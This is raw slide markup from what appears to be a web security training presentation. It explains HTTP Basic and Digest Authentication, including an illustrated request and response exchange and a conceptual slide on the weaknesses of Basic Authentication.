                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Originally defined in RFC 1945</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Username and password transmitted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Server uses a "Realm" to identify itself to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Realm is able to be set to anything by the administrator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Encoded in Base64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Takes each three byte chunk and converts it to four printable ASCII characters using character set of 10 numbers, 26 lowercase, 26 upper case, +, and /</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>10 + 26 + 26 + 2 = 64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pads to 3 bytes using = sign</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Not encrypted, a very simple obfuscation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Numerous free tools, widgets, and websites encode and reverse Base64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The web server handles the verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Apache uses .htaccess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>IIS uses local accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59396" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-8000" contrast="8000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="1905000"/>
            <a:ext cx="3857625" cy="152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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Basic Authentication Illustrated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4191000"/>
            <a:ext cx="800100" cy="269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Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60420" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="4191000"/>
            <a:ext cx="1041400" cy="269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Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60421" name="Straight Connector 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1981200" y="2133600"/>
            <a:ext cx="5181600" cy="23813"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60422" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="2286000"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60423" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2590800" y="2209800"/>
            <a:ext cx="4398963" cy="82867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nSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Client Request:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>GET /adminpage/index.html HTTP/1.1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60424" name="Straight Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2133600" y="3352800"/>
            <a:ext cx="5181600" cy="23813"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="med"/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60425" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2438400" y="3429000"/>
            <a:ext cx="4572000" cy="123880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nSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server Response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 401 Authorization Required</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>WWW-Authenticate: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> realm=secureideas.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60426" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2209800" y="4876800"/>
            <a:ext cx="6705600" cy="103346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nSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Client Request:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>GET /adminpage/index.html HTTP/1.1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Authorization: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>a2pvaG5zb246RGVuaXNIIUJyZW5uYSFTYXJhaCE=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60427" name="Straight Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1981200" y="4800600"/>
            <a:ext cx="5181600" cy="23813"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60428" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="3733800"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60429"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2895600"/>
            <a:ext cx="1371600" cy="2535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30"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2819400"/>
            <a:ext cx="1371600" cy="2535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431" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="5181600"/>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3</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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s Perspective of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Basic Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Basic Authentication has no concept of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Account lockout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Maximum number of login attempts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Plain text authentication, easily sniffable if not passed via HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can easily be replayed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Impersonating the website to dupe browsers into providing authentication credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>No log out functionality without closing the browser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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Digest Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Designed to "fix" Basic authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Similar to Basic Authentication, except:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses MD5 to send password hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Has a nonce to use as a salt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Defined in RFC 2069</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>RFC 2069 was replaced by 2617</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Added security enhancements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Quality of Protection (qop) flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The qop flag tells the client how to generate the response hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client Nonce (cnonce)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Provides a unique value to fold into hash algorithm so that hashed password isn'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>t always the same value</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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2895600"/>
            <a:ext cx="1371600" cy="2535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3491" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Digest Authentication Illustrated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63492" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4191000"/>
            <a:ext cx="800100" cy="269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Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63493" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="4191000"/>
            <a:ext cx="1041400" cy="269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Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63494" name="Straight Connector 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1981200" y="1574244"/>
            <a:ext cx="5181600" cy="23813"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
